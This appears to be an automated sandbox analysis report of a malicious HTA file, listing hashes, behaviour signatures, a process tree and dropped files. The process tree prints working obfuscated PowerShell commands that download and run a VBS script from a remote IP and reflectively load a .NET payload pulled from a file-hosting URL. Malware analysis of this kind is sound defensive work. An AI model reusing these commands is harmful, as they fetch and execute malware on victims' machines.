Analysis

  • max time kernel
    117s
  • max time network
    118s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    07-02-2025 13:30

General

  • Target

    niceskillwithbetterservicegoodgirlmylover.hta

  • Size

    14KB

  • MD5

    59123cec8e9618aeaa7236be2489518f

  • SHA1

    43d7d2d922d19407897165e0d30644a8fa409623

  • SHA256

    eae0a340faa2c93a9f0829ac6a1d1ea7323089f3eb5f3966153b1e4967e631e6

  • SHA512

    427e7392bc9cd679d0e25a34f9e48f9696556208dd945f0d418f0a06d41106a3eae2c009eaccfe706ea237d15521c81cb99008c1d173578355e47226b448b99e

  • SSDEEP

    48:3au7yrUM7CCrUXkEkgozHc699DdDfbyy1bUB0a0su7+7DaWrUh7LG:quygcCCgPRadfZfGy1m0a0R+Lg96

Malware Config

Signatures

  • Blocklisted process makes network request 3 IoCs
  • Evasion via Device Credential Deployment 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 24 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\niceskillwithbetterservicegoodgirlmylover.hta"
    1⤵
    • System Location Discovery: System Language Discovery
    • Modifies Internet Explorer settings
    • Suspicious use of WriteProcessMemory
    PID:3016
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" "/c pOwershElL -eX bYPAsS -NOP -w 1 -c deVICecReDEntIaLdEPLOyMenT.EXe ; iEx($(IEx('[systEm.teXt.eNcoDiNG]'+[chAR]58+[ChaR]0X3A+'uTF8.GeTString([syStEm.CoNVERt]'+[chAr]0X3a+[cHar]0X3A+'FrOmbasE64sTrIng('+[CHAR]0X22+'JFpWaVRpUzBNMCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtdHlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NZU1iRXJERUZpTkl0SW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVybG1PTi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB6WVJta2tqbyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqZ2ZXenJtQmFlLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFViZ3AsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtBRExJbW9oLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERESnJiWmZoREgpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJQbiIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtZXNQQUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeEV0eGJwZ0lqTSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkWlZpVGlTME0wOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xMjMuODYvNzcwL25pY2Vza2lsbHdpdGhiZXR0ZXJzZXJ2aWNlZ29vZGdpcmxteWxvdmVyLmdJRiIsIiRFTnY6QVBQREFUQVxuaWNlc2tpbGx3aXRoYmV0dGVyc2VydmljZWdvb2RnaXJsbXlsb3ZlcmVnb28udmJzIiwwLDApO3NUYVJULVNsRWVwKDMpO2lOVm9LRS1JdEVtICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxuaWNlc2tpbGx3aXRoYmV0dGVyc2VydmljZWdvb2RnaXJsbXlsb3ZlcmVnb28udmJzIg=='+[cHaR]34+'))')))"
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2504
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        pOwershElL -eX bYPAsS -NOP -w 1 -c deVICecReDEntIaLdEPLOyMenT.EXe ; iEx($(IEx('[systEm.teXt.eNcoDiNG]'+[chAR]58+[ChaR]0X3A+'uTF8.GeTString([syStEm.CoNVERt]'+[chAr]0X3a+[cHar]0X3A+'FrOmbasE64sTrIng('+[CHAR]0X22+'JFpWaVRpUzBNMCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtdHlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NZU1iRXJERUZpTkl0SW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVybG1PTi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB6WVJta2tqbyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqZ2ZXenJtQmFlLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFViZ3AsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtBRExJbW9oLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERESnJiWmZoREgpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJQbiIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtZXNQQUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeEV0eGJwZ0lqTSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkWlZpVGlTME0wOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xMjMuODYvNzcwL25pY2Vza2lsbHdpdGhiZXR0ZXJzZXJ2aWNlZ29vZGdpcmxteWxvdmVyLmdJRiIsIiRFTnY6QVBQREFUQVxuaWNlc2tpbGx3aXRoYmV0dGVyc2VydmljZWdvb2RnaXJsbXlsb3ZlcmVnb28udmJzIiwwLDApO3NUYVJULVNsRWVwKDMpO2lOVm9LRS1JdEVtICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxuaWNlc2tpbGx3aXRoYmV0dGVyc2VydmljZWdvb2RnaXJsbXlsb3ZlcmVnb28udmJzIg=='+[cHaR]34+'))')))"
        3⤵
        • Blocklisted process makes network request
        • Evasion via Device Credential Deployment
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2180
        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
          "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\-rvivcee.cmdline"
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2308
          • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
            C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB8D5.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCB8D4.tmp"
            5⤵
            • System Location Discovery: System Language Discovery
            PID:2740
        • C:\Windows\SysWOW64\WScript.exe
          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\niceskillwithbetterservicegoodgirlmyloveregoo.vbs"
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2608
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "[System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('JABvAHIAaQBnAGkAbgBhAGwAVABlAHgAdAAgAD0AIAAnAHQAeAB0AC4AcgBlAHYAbwBsAHkAbQBsAHIAaQBnAGQAbwBvAGcAZQBjAGkAdgByAGUAcwByAGUAdAB0AGUAYgBoAHQAaQB3AGwAbABpAGsAcwBlAGMAaQBuAC8AMAA3ADcALwA2ADgALgAzADIAMQAuADUANAAyAC4AMgA3ADEALwAvADoAcAB0AHQAaAAnADsAJAByAGUAcwB0AG8AcgBlAGQAVABlAHgAdAAgAD0AIAAkAG8AcgBpAGcAaQBuAGEAbABUAGUAeAB0ACAALQByAGUAcABsAGEAYwBlACAAJwAjACcALAAgACcAdAAnADsAJABpAG0AYQBnAGUAVQByAGwAIAA9ACAAJwBoAHQAdABwAHMAOgAvAC8AMQAwADAAOAAuAGYAaQBsAGUAbQBhAGkAbAAuAGMAbwBtAC8AYQBwAGkALwBmAGkAbABlAC8AZwBlAHQAPwBmAGkAbABlAGsAZQB5AD0AagB6AHcARQBIAEEASgBQAHgASwBMAEwAegBnAFoARgBoAFkAVgBBAFEATQBBAE8ARQBOAEgAMQBRAHcAdgA4AGEAcwBFAG4ANAAzAHIATgBIADgAdwBPAGcAcQB4AGcATABOADUAeQBnAGcARQBLAGgAOQBFAGcAQQA5ADcARwBnAGMATABYAFEAZwAmAHAAawBfAHYAaQBkAD0AMwA0ADIAOAAwADMAZAAxAGMAYwA0AGUAMwBiADgAMAAxADcAMwA4ADgAOAAyADQAOQA1AGIANQBmAGUAOQBkACcAOwAkAHcAZQBiAEMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAGkAbQBhAGcAZQBCAHkAdABlAHMAIAA9ACAAJAB3AGUAYgBDAGwAaQBlAG4AdAAuAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACgAJABpAG0AYQBnAGUAVQByAGwAKQA7ACQAaQBtAGEAZwBlAFQAZQB4AHQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABpAG0AYQBnAGUAQgB5AHQAZQBzACkAOwAkAHMAdABhAHIAdABGAGwAYQBnACAAPQAgACcAPAA8AEIAQQBTAEUANgA0AF8AUwBUAEEAUgBUAD4APgAnADsAJABlAG4AZABGAGwAYQBnACAAPQAgACcAPAA8AEIAQQBTAEUANgA0AF8ARQBOAEQAPgA+ACcAOwAkAHMAdABhAHIAdABJAG4AZABlAHgAIAA9ACAAJABpAG0AYQBnAGUAVABlAHgAdAAuAEkAbgBkAGUAeABPAGYAKAAkAHMAdABhAHIAdABGAGwAYQBnACkAOwAkAGUAbgBkAEkAbgBkAGUAeAAgAD0AIAAkAGkAbQBhAGcAZQBUAGUAeAB0AC4ASQBuAGQAZQB4AE8AZgAoACQAZQBuAGQARgBsAGEAZwApADsAJABzAHQAYQByAHQASQBuAGQAZQB4ACAALQBnAGUAIAAwACAALQBhAG4AZAAgACQAZQBuAGQASQBuAGQAZQB4ACAALQBnAHQAIAAkAHMAdABhAHIAdABJAG4AZABlAHgAOwAkAHMAdABhAHIAdABJAG4AZABlAHgAIAArAD0AIAAkAHMAdABhAHIAdABGAGwAYQBnAC4ATABlAG4AZwB0AGgAOwAkAGIAYQBzAGUANgA0AEwAZQBuAGcAdABoACAAPQAgACQAZQBuAGQASQBuAGQAZQB4ACAALQAgACQAcwB0AGEAcgB0AEkAbgBkAGUAeAA7ACQAYgBhAHMAZQA2ADQAQwBvAG0AbQBhAG4AZAAgAD0AIAAkAGkAbQBhAGcAZQBUAGUAeAB0AC4AUwB1AGIAcwB0AHIAaQBuAGcAKAAkAHMAdABhAHIAdABJAG4AZABlAHgALAAgACQAYgBhAHMAZQA2ADQATABlAG4AZwB0AGgAKQA7ACQAYwBvAG0AbQBhAG4AZABCAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAYgBhAHMAZQA2ADQAQwBvAG0AbQBhAG4AZAApADsAJABsAG8AYQBkAGUAZABBAHMAcwBlAG0AYgBsAHkAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoACQAYwBvAG0AbQBhAG4AZABCAHkAdABlAHMAKQA7ACQAdAB5AHAAZQAgAD0AIABbAEMAbABhAHMAcwBMAGkAYgByAGEAcgB5ADEALgBIAG8AbQBlAF0ALgBHAGUAdABNAGUAdABoAG8AZAAoACcAbQBhAGkAbgAnACkALgBJAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsACAAWwBvAGIAagBlAGMAdABbAF0AXQAgAEAAKAAkAHIAZQBzAHQAbwByAGUAZABUAGUAeAB0ACwAJwBmAGEAbABzAGUAJwAsACcAQwBhAHMAUABvAGwAJwAsACcAZgBhAGwAcwBlACcAKQApAA==')) | Invoke-Expression"
            5⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:3036

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\-rvivcee.dll

    Filesize

    3KB

    MD5

    307f3430917159279ed8c390a621559f

    SHA1

    4c8fdc59a95bd2e0c3b5a97b58c7f1aa5866dc6d

    SHA256

    f26dab0396cbc1fd0b04c45ad263f271c8c70db7780447d261811a1dbca37759

    SHA512

    9e110beaba03dd6966cbbf394a55eb3b5af5fc3f029aa37915751f3d81b6d3080f64698398eca95acd074343007955cea86dab4773bab2a31d23b73321a8c319

  • C:\Users\Admin\AppData\Local\Temp\-rvivcee.pdb

    Filesize

    7KB

    MD5

    bebe85c6859c374f58630078f70ae447

    SHA1

    b6ecbb2f55e85d51aa373ad7c96c1ea27a1d1303

    SHA256

    4a5546e78b617e2f54376c461f6c15b538d95e8fefbe29753c5c08786f1c31e5

    SHA512

    05846f412ee17978471617ac40caa902d25cc049974d9bb3bb36910ac371afda86041c60cf5299bcb699752e668fec23a713868f6a83a67582bf43bcc0fa7a3b

  • C:\Users\Admin\AppData\Local\Temp\RESB8D5.tmp

    Filesize

    1KB

    MD5

    99d6d9d8c0522262fd2af6538f90c9e5

    SHA1

    b778cdc2d0b85813c9a23efb9cfdad8c0bf24d44

    SHA256

    23940936ee8cb1849127f2df89c1de6dd289990b2d5f938d907ff7cdc9087345

    SHA512

    d374622822dae88cf450fc652e5bce933ddded19b8286775f2d36a12e7b9ec92152c173fca3b760e54acf988ceef84c11ce877ba4fb22ca26ce9871b2a3b7fff

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

    Filesize

    7KB

    MD5

    203598824646c3c9ce3fd22d1a225cdb

    SHA1

    a06e52f7ef61168ad9bb96c972bc05127b52ab89

    SHA256

    f1e948ad7067538e5c98be6b80dcaea73f3d2294c5123b72b17bbf6da87741eb

    SHA512

    895f141005352dc1738a333794299131f94ca44dc93c0cedd0200e67f8813298b502b04b7bbf26e3b7be4d40a9d6cbf8f4341ec6e1f8cc92b4ce35cb5fc128c4

  • C:\Users\Admin\AppData\Roaming\niceskillwithbetterservicegoodgirlmyloveregoo.vbs

    Filesize

    189KB

    MD5

    e46a3153fbce8c6b616865a299f84b0f

    SHA1

    68d8ab3028dcc62397119843f95866b04940e1ce

    SHA256

    15c6eaf3a7debf24c49a4609b6a2c3c9ad2632b39fa8570766a5df077c12009b

    SHA512

    c67f63ec7046578cd525408b17f05bacf614b72f4bc3d60bd6b14b37b17b7b587a48f83c5d669f0aaafc2c2dca382268e39b4e145de28b7967e1a22e28e8bc0c

  • \??\c:\Users\Admin\AppData\Local\Temp\-rvivcee.0.cs

    Filesize

    489B

    MD5

    06ce6df8c264b461dcdeef00df36b8de

    SHA1

    050df9c041ebca4c7e6cf8febddcb80e95f55769

    SHA256

    ab829027e3a474c684b12b0abce9ef3601a2695b3ddd6d5b699e7df0482b2e28

    SHA512

    03a1d3e658866433b928601123c1ae3cf89262661b9143a0eadb5a99c27ed45eb2d3aef17461c1e5b2e60ddad024378cd99786be101371aa09e4122d0bf9be6f

  • \??\c:\Users\Admin\AppData\Local\Temp\-rvivcee.cmdline

    Filesize

    309B

    MD5

    fd25684e277fdca5c9a7444da28747d0

    SHA1

    aacebf5d5b252629d6fefb439fff91619221cfc8

    SHA256

    206cd52157ff6a5b1c5f51e3352c72977da13578c29c6f4bfd2b682423216f2b

    SHA512

    bd8596d725e0bf46ccf9a82a92bc832000c115b5c7d0a2ad94541c0fd94465d55625eb5d755da0d84e8896b0aba98e2eacb78918fa5afab2584595423ad06e19

  • \??\c:\Users\Admin\AppData\Local\Temp\CSCB8D4.tmp

    Filesize

    652B

    MD5

    fbfb39b4ea83ad2279534096fb47d437

    SHA1

    eec5b97efc9cf295d7389c69b8761e35d285194d

    SHA256

    38bdf41f6e57df15c0bbc73ad297c5707126e2f3b1a62db3a281f6eb395bb20e

    SHA512

    17b84bd3f43703df2476b6350c7a16d79bf9a82ce365fca6d90aac9d43f515ff30b14a587c76180d1932836e9825b384157f15d2bfd72c2ff0dbd0475e86bb8f